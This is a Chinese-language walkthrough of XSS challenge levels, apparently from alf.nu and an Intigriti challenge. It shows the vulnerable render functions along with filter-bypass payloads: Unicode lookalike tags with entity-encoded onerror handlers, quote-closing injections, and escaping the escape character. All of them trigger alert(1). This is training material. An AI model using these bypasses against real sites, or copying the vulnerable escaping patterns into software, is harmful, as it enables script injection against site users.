<p>如果字母和左尖括号放在一起，字母前会被加上下划线，哇正则表达式你也是学到了</p>
<p>标签不能用回车来绕过，会无法读取，这里用到了古英文</p>
<div class="code-container" code-lang="Html"><div class="codebox"><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">ımg</span> <span class="attr">src</span>=<span class="string">&quot;x&quot;</span> <span class="attr">onerror</span>=<span class="string">&quot;<span class="symbol">&amp;#97;</span><span class="symbol">&amp;#108;</span><span class="symbol">&amp;#101;</span><span class="symbol">&amp;#114;</span><span class="symbol">&amp;#116;</span><span class="symbol">&amp;#40;</span><span class="symbol">&amp;#49;</span><span class="symbol">&amp;#41;</span>&quot;</span>/&gt;</span></span><br><span class="line"></span><br><span class="line"><span class="tag">&lt;ſcript <span class="attr">src</span>=<span class="string">&quot;&quot;</span> <span class="attr">οnerrοr</span>=<span class="string">&quot;<span class="symbol">&amp;#97;</span><span class="symbol">&amp;#108;</span><span class="symbol">&amp;#101;</span><span class="symbol">&amp;#114;</span><span class="symbol">&amp;#116;</span><span class="symbol">&amp;#40;</span><span class="symbol">&amp;#49;</span><span class="symbol">&amp;#41;</span>&quot;</span>&gt;</span></span><br><span class="line">    第二种解法也没出</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>

<p> ſ 大写后为 S（ſ 不等于s） </p>
<p>也有可能是Unicode编码</p>
<h3 id="0x0F"><a href="#0x0F" class="headerlink" title="0x0F"></a>0x0F</h3><div class="code-container" code-lang="Javascript"><div class="codebox"><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">function</span> <span class="title function_">render</span> (<span class="params">input</span>) &#123;</span><br><span class="line">  <span class="keyword">function</span> <span class="title function_">escapeHtml</span>(<span class="params">s</span>) &#123;</span><br><span class="line">    <span class="keyword">return</span> s.<span class="title function_">replace</span>(<span class="regexp">/&amp;/g</span>, <span class="string">&#x27;&amp;amp;&#x27;</span>)</span><br><span class="line">            .<span class="title function_">replace</span>(<span class="regexp">/&#x27;/g</span>, <span class="string">&#x27;&amp;#39;&#x27;</span>)</span><br><span class="line">            .<span class="title function_">replace</span>(<span class="regexp">/&quot;/g</span>, <span class="string">&#x27;&amp;quot;&#x27;</span>)</span><br><span class="line">            .<span class="title function_">replace</span>(<span class="regexp">/&lt;/g</span>, <span class="string">&#x27;&amp;lt;&#x27;</span>)</span><br><span class="line">            .<span class="title function_">replace</span>(<span class="regexp">/&gt;/g</span>, <span class="string">&#x27;&amp;gt;&#x27;</span>)</span><br><span class="line">            .<span class="title function_">replace</span>(<span class="regexp">/\//g</span>, <span class="string">&#x27;&amp;#x2f;&#x27;</span>)</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">return</span> <span class="string">`&lt;img src onerror=&quot;console.error(&#x27;<span class="subst">$&#123;escapeHtml(input)&#125;</span>&#x27;)&quot;&gt;`</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>

<p>括号没有被过滤，可以正常被闭合</p>
<div class="code-container" code-lang="Html"><div class="codebox"><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#x27;);alert(1)(&#x27;</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>

<p>闭合前后，相当于三个命令的执行，一个为空一个为alert函数，一个是console.error函数</p>
<h3 id="0x10"><a href="#0x10" class="headerlink" title="0x10"></a>0x10</h3><p>Window 对象描述 Window 对象表示一个浏览器窗口或一个框架。在客户端 JavaScript 中，Window对象是全局对象，所有的表达式都在当前的环境中计算。也就是说，要引用当前窗口根本不需要特殊的语法，可以把那个窗口的属性作为全局变量来使用。</p>
<div class="code-container" code-lang="Javascript"><div class="codebox"><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">function</span> <span class="title function_">render</span> (<span class="params">input</span>) &#123;</span><br><span class="line">  <span class="keyword">return</span> <span class="string">`</span></span><br><span class="line"><span class="string">&lt;script&gt;</span></span><br><span class="line"><span class="string">  window.data = <span class="subst">$&#123;input&#125;</span></span></span><br><span class="line"><span class="string">&lt;/script&gt;</span></span><br><span class="line"><span class="string">  `</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>

<p>所以这里input直接给需要执行的命令，不需要任何标签</p>
<h3 id="0x11"><a href="#0x11" class="headerlink" title="0x11"></a>0x11</h3><div class="code-container" code-lang="Javascript"><div class="codebox"><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// from alf.nu</span></span><br><span class="line"><span class="keyword">function</span> <span class="title function_">render</span> (<span class="params">s</span>) &#123;</span><br><span class="line">  <span class="keyword">function</span> <span class="title function_">escapeJs</span> (<span class="params">s</span>) &#123;</span><br><span class="line">    <span class="keyword">return</span> <span class="title class_">String</span>(s)</span><br><span class="line">            .<span class="title function_">replace</span>(<span class="regexp">/\\/g</span>, <span class="string">&#x27;\\\\&#x27;</span>)</span><br><span class="line">            .<span class="title function_">replace</span>(<span class="regexp">/&#x27;/g</span>, <span class="string">&#x27;\\\&#x27;&#x27;</span>)</span><br><span class="line">            .<span class="title function_">replace</span>(<span class="regexp">/&quot;/g</span>, <span class="string">&#x27;\\&quot;&#x27;</span>)</span><br><span class="line">            .<span class="title function_">replace</span>(<span class="regexp">/`/g</span>, <span class="string">&#x27;\\`&#x27;</span>)</span><br><span class="line">            .<span class="title function_">replace</span>(<span class="regexp">/&lt;/g</span>, <span class="string">&#x27;\\74&#x27;</span>)</span><br><span class="line">            .<span class="title function_">replace</span>(<span class="regexp">/&gt;/g</span>, <span class="string">&#x27;\\76&#x27;</span>)</span><br><span class="line">            .<span class="title function_">replace</span>(<span class="regexp">/\//g</span>, <span class="string">&#x27;\\/&#x27;</span>)</span><br><span class="line">            .<span class="title function_">replace</span>(<span class="regexp">/\n/g</span>, <span class="string">&#x27;\\n&#x27;</span>)</span><br><span class="line">            .<span class="title function_">replace</span>(<span class="regexp">/\r/g</span>, <span class="string">&#x27;\\r&#x27;</span>)</span><br><span class="line">            .<span class="title function_">replace</span>(<span class="regexp">/\t/g</span>, <span class="string">&#x27;\\t&#x27;</span>)</span><br><span class="line">            .<span class="title function_">replace</span>(<span class="regexp">/\f/g</span>, <span class="string">&#x27;\\f&#x27;</span>)</span><br><span class="line">            .<span class="title function_">replace</span>(<span class="regexp">/\v/g</span>, <span class="string">&#x27;\\v&#x27;</span>)</span><br><span class="line">            <span class="comment">// .replace(/\b/g, &#x27;\\b&#x27;)</span></span><br><span class="line">            .<span class="title function_">replace</span>(<span class="regexp">/\0/g</span>, <span class="string">&#x27;\\0&#x27;</span>)</span><br><span class="line">  &#125;</span><br><span class="line">  s = <span class="title function_">escapeJs</span>(s)</span><br><span class="line">  <span class="keyword">return</span> <span class="string">`</span></span><br><span class="line"><span class="string">&lt;script&gt;</span></span><br><span class="line"><span class="string">  var url = &#x27;javascript:console.log(&quot;<span class="subst">$&#123;s&#125;</span>&quot;)&#x27;</span></span><br><span class="line"><span class="string">  var a = document.createElement(&#x27;a&#x27;)</span></span><br><span class="line"><span class="string">  a.href = url</span></span><br><span class="line"><span class="string">  document.body.appendChild(a)</span></span><br><span class="line"><span class="string">  a.click()</span></span><br><span class="line"><span class="string">&lt;/script&gt;</span></span><br><span class="line"><span class="string">`</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>

<p>JS 解析的优先级是「先处理转义符 → 再执行表达式 → 最后处理语法错误」，这也是 <code>alert</code> 能执行的关键 也就是说转义符会被直接无视 等于没有黑名单 直接照着前面闭合就可以了</p>
<p>会对特殊字符进行转义，但是注入的位置在<code>js</code>的字符串中，因此转义过的字符也会被正常解析</p>
<p>也就是说，这里转义与否只会在html呈现中有体现，不影响实际执行内容，所以正常闭合，然后该注释掉的注释掉，注意这个是在文字中间所以，注意语法完整</p>
<div class="code-container" code-lang="Html"><div class="codebox"><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&quot;);alert(1)//</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>



<h3 id="0x12"><a href="#0x12" class="headerlink" title="0x12"></a>0x12</h3><div class="code-container" code-lang="Javascript"><div class="codebox"><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// from alf.nu</span></span><br><span class="line"><span class="keyword">function</span> <span class="title function_">escape</span> (<span class="params">s</span>) &#123;</span><br><span class="line">  s = s.<span class="title function_">replace</span>(<span class="regexp">/&quot;/g</span>, <span class="string">&#x27;\\&quot;&#x27;</span>)</span><br><span class="line">  <span class="keyword">return</span> <span class="string">&#x27;&lt;script&gt;console.log(&quot;&#x27;</span> + s + <span class="string">&#x27;&quot;);&lt;/script&gt;&#x27;</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>

<p>转义转义符</p>
<p>payload呈现的就是把已经转义的直接交上去，当成是已经被转义的内容。</p>
<div class="code-container" code-lang="Html"><div class="codebox"><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">\&quot;);alert(1)//</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>

<p>相当于拼凑一个转义的结果，促使执行的时候就按照转义转义符之后的内容写</p>
<p>拼接的结果：</p>
<div class="code-container" code-lang="Javascript"><div class="codebox"><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;<span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">&quot;\\&quot;</span>);<span class="title function_">alert</span>(<span class="number">1</span>)<span class="comment">//&quot;);&lt;/script&gt;</span></span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>

<p>双引号的部分就可以被解析出来</p>
<h2 id="XSS-challenge"><a href="#XSS-challenge" class="headerlink" title="XSS challenge"></a>XSS challenge</h2><p><a target="_blank" rel="noopener" href="https://challenge-0222.intigriti.io/">challenge</a></p>
<p><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/%5Cimages%5CBLOG%5CXSS%5Cimage-20260126144151637.png" ></p>
<p>抓包内容里有对应脚本</p>
<p>前端动效部分不用管</p>
<div class="code-container" code-lang="Html"><div class="codebox"><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript">  <span class="variable language_">window</span>.<span class="property">name</span> = <span class="string">&#x27;XSS(eXtreme Short Scripting) Game&#x27;</span></span></span><br><span class="line"><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript">  <span class="keyword">function</span> <span class="title function_">showModal</span>(<span class="params">title, content</span>) &#123;</span></span><br><span class="line"><span class="language-javascript">    <span class="keyword">var</span> titleDOM = <span class="variable language_">document</span>.<span class="title function_">querySelector</span>(<span class="string">&#x27;#main-modal h3&#x27;</span>)</span></span><br><span class="line"><span class="language-javascript">    <span class="keyword">var</span> contentDOM = <span class="variable language_">document</span>.<span class="title function_">querySelector</span>(<span class="string">&#x27;#main-modal p&#x27;</span>)</span></span><br><span class="line"><span class="language-javascript">    titleDOM.<span class="property">innerHTML</span> = title</span></span><br><span class="line"><span class="language-javascript">    contentDOM.<span class="property">innerHTML</span> = content</span></span><br><span class="line"><span class="language-javascript">    <span class="variable language_">window</span>[<span class="string">&#x27;main-modal&#x27;</span>].<span class="property">classList</span>.<span class="title function_">remove</span>(<span class="string">&#x27;hide&#x27;</span>)</span></span><br><span class="line"><span class="language-javascript">  &#125;</span></span><br><span class="line"><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript">  <span class="variable language_">window</span>[<span class="string">&#x27;main-form&#x27;</span>].<span class="property">onsubmit</span> = <span class="keyword">function</span>(<span class="params">e</span>) &#123;</span></span><br><span class="line"><span class="language-javascript">    e.<span class="title function_">preventDefault</span>()</span></span><br><span class="line"><span class="language-javascript">    <span class="keyword">var</span> inputName = <span class="variable language_">window</span>[<span class="string">&#x27;name-field&#x27;</span>].<span class="property">value</span></span></span><br><span class="line"><span class="language-javascript">    <span class="keyword">var</span> isFirst = <span class="variable language_">document</span>.<span class="title function_">querySelector</span>(<span class="string">&#x27;input[type=radio]:checked&#x27;</span>).<span class="property">value</span></span></span><br><span class="line"><span class="language-javascript">    <span class="keyword">if</span> (!inputName.<span class="property">length</span>) &#123;</span></span><br><span class="line"><span class="language-javascript">      <span class="title function_">showModal</span>(<span class="string">&#x27;Error!&#x27;</span>, <span class="string">&quot;It&#x27;s empty&quot;</span>)</span></span><br><span class="line"><span class="language-javascript">      <span class="keyword">return</span></span></span><br><span class="line"><span class="language-javascript">    &#125;</span></span><br><span class="line"><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript">    <span class="keyword">if</span> (inputName.<span class="property">length</span> &gt; <span class="number">24</span>) &#123;</span></span><br><span class="line"><span class="language-javascript">      <span class="title function_">showModal</span>(<span class="string">&#x27;Error!&#x27;</span>, <span class="string">&quot;Length exceeds 24, keep it short!&quot;</span>)</span></span><br><span class="line"><span class="language-javascript">      <span class="keyword">return</span></span></span><br><span class="line"><span class="language-javascript">    &#125;</span></span><br><span class="line"><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript">    <span class="variable language_">window</span>.<span class="property">location</span>.<span class="property">search</span> = <span class="string">&quot;?q=&quot;</span> + <span class="built_in">encodeURIComponent</span>(inputName) + <span class="string">&#x27;&amp;first=&#x27;</span> + isFirst</span></span><br><span class="line"><span class="language-javascript">      <span class="comment">//这里是输入内容的处理（先编码）</span></span></span><br><span class="line"><span class="language-javascript">  &#125;</span></span><br><span class="line"><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript">  <span class="keyword">if</span> (location.<span class="property">href</span>.<span class="title function_">includes</span>(<span class="string">&#x27;q=&#x27;</span>)) &#123;</span></span><br><span class="line"><span class="language-javascript">  <span class="comment">// 将 url 进行解码后赋值给 uri</span></span></span><br><span class="line"><span class="language-javascript">  <span class="keyword">var</span> uri = <span class="built_in">decodeURIComponent</span>(location.<span class="property">href</span>)</span></span><br><span class="line"><span class="language-javascript">  <span class="comment">// 截取出 q 参数的值</span></span></span><br><span class="line"><span class="language-javascript">  <span class="keyword">var</span> qs = uri.<span class="title function_">split</span>(<span class="string">&#x27;&amp;first=&#x27;</span>)[<span class="number">0</span>].<span class="title function_">split</span>(<span class="string">&#x27;?q=&#x27;</span>)[<span class="number">1</span>]</span></span><br><span class="line"><span class="language-javascript">  <span class="comment">// 对值进行判定，条件成立时返回 qs 中的内容</span></span></span><br><span class="line"><span class="language-javascript">    <span class="keyword">if</span> (qs.<span class="property">length</span> &gt; <span class="number">24</span>) &#123;</span></span><br><span class="line"><span class="language-javascript">      <span class="title function_">showModal</span>(<span class="string">&#x27;Error!&#x27;</span>, <span class="string">&quot;Length exceeds 24, keep it short!&quot;</span>)</span></span><br><span class="line"><span class="language-javascript">    &#125; <span class="keyword">else</span> &#123;</span></span><br><span class="line"><span class="language-javascript">      <span class="title function_">showModal</span>(<span class="string">&#x27;Welcome back!&#x27;</span>, qs)</span></span><br><span class="line"><span class="language-javascript">    &#125;</span></span><br><span class="line"><span class="language-javascript">  &#125;</span></span><br><span class="line"><span class="language-javascript"></span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>

<p><code>eval()</code> 是一个功能强大的内置函数，主要用于将字符串解析为有效的表达式、数值或语句并执行，随后返回执行结果。它广泛用于 Python、JavaScript、PHP 等编程语言中，常用于动态计算算术表达式、转换数据类型（如字符串转字典&#x2F;列表）或执行代码，但因其可执行任意代码，存在严重的安全风险。 </p>
<p><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/%5Cimages%5CBLOG%5CXSS%5Cimage-20260126155359586.png" ></p>
<p>要求中还表示需要包含<code>alert(document.domain)</code>，同时有长度限制</p>
<p>长度检查有q和qs</p>
<p>注入位置是<code>innerHTML</code>：</p>
<ul>
<li><code>innerHTML</code> 操作的是元素的内部内容。</li>
<li><code>outerHTML</code> 操作的是包括元素自身在内的整个 HTML 结构。</li>
</ul>
<p>JS 的解析逻辑<br>按行扫描 行内必须是合法 JS 新的一行是新的语句开始点</p>
<ul>
<li>HTTP 协议规范规定：一行头必须以 CRLF 结尾</li>
<li>这一行结束了，下一行当成新的语句重新解析</li>
</ul>
<p>在JavaScript中，使用<code>innerHTML</code>属性将一个字符串（假设为<code>qs</code>）作为HTML解析并插入到DOM树中</p>
<ol>
<li>页面初始加载时，浏览器会解析HTML文档，构建DOM树。</li>
<li>在页面加载后，JavaScript代码执行，获取到DOM元素（<code>contentDOM</code>），然后设置其<code>innerHTML</code>属性为字符串<code>qs</code>。</li>
<li>浏览器会将字符串<code>qs</code>当作HTML来解析，并生成相应的DOM节点，然后插入到<code>contentDOM</code>元素中，成为其子节点。</li>
<li>通过 <code>innerHTML</code> 动态插入的 <code>&lt;script&gt;</code> 标签，默认不会执行</li>
</ol>
<p>这样的句式，实际上执行的也是<code>alert(document.domain)</code></p>
<p>对特殊字符进行编码可以防止过滤</p>
